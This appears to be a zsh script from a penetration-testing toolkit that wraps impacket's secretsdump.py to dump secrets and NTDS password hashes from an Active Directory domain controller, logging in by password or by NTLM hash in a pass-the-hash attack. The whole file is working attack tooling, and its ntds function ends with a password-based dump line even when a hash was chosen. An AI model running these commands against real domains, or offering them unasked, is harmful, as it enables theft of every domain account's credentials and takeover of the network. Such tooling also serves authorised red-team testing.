#!/usr/bin/env zsh

############################################################# 
# nb-ad-dump-hash
#############################################################
nb-ad-dump-hash-help() {
    cat << "DOC" | bat --plain --language=help

nb-ad-dump-hash
------------
The nb-ad-dump-hash namespace contains commands for pass-the-hash attack on Active Directory DC server.

Commands
--------
nb-ad-dump-hash-install         installs dependencies
nb-ad-dump-hash-secrets         dump secrets from the remote machine
nb-ad-dump-hash-ntds            

DOC
}

nb-ad-dump-hash-install() {
    __info "Running $0..."
    __pkgs impacket
}

nb-ad-dump-hash-secrets() {
    __check-project
    __check-network
    __check-domain
    __check-user
    echo

    __ask "Do you want to log in using a password or a hash? (p/h)"
    local login && __askvar login "LOGIN_OPTION"

    if [[ $login == "p" ]]; then
        echo
        __ask "Enter a password for authentication"
        __check-pass
        print -z secretsdump.py ${__DOMAIN}/${__USER}:"${__PASS}"@${__RHOST} | tee -a ${__domainadpath}/${__USER}-hashdump.txt
    elif [[ $login == "h" ]]; then
        echo
        __ask "Enter the NTLM hash for authentication"
        __check-hash
        print -z secretsdump.py ${__USER}@${__RHOST} -hashes ${__HASH} | tee -a ${__domainadpath}/${__USER}-hashdump.txt
    else
        echo
        __err "Invalid option. Please choose 'p' for password or 'h' for hash."
    fi
}

nb-ad-dump-hash-ntds() {
    __check-project
    __check-network
    __check-domain
    __check-user
    echo

    __ask "Do you want to log in using a password or a hash? (p/h)"
    local login && __askvar login "LOGIN_OPTION"

    if [[ $login == "p" ]]; then
        echo
        __ask "Enter a password for authentication"
        __check-pass
        print -z "secretsdump.py ${__DOMAIN}/${__USER}:"${__PASS}"@${__RHOST} | tee -a ${__domainadpath}/${__USER}-hashdump.txt"
    elif [[ $login == "h" ]]; then
        echo
        __ask "Enter the NTLM hash for authentication"
        __check-hash
        print -z "secretsdump.py ${__USER}@${__RHOST} -hashes ${__HASH} | tee -a ${__domainadpath}/${__USER}-hashdump.txt"
    else
        echo
        __err "Invalid option. Please choose 'p' for password or 'h' for hash."
    fi

    print -z "secretsdump.py ${__DOMAIN}/${__USER}:"${__PASS}"@${__RHOST} -just-dc-ntlm"
}
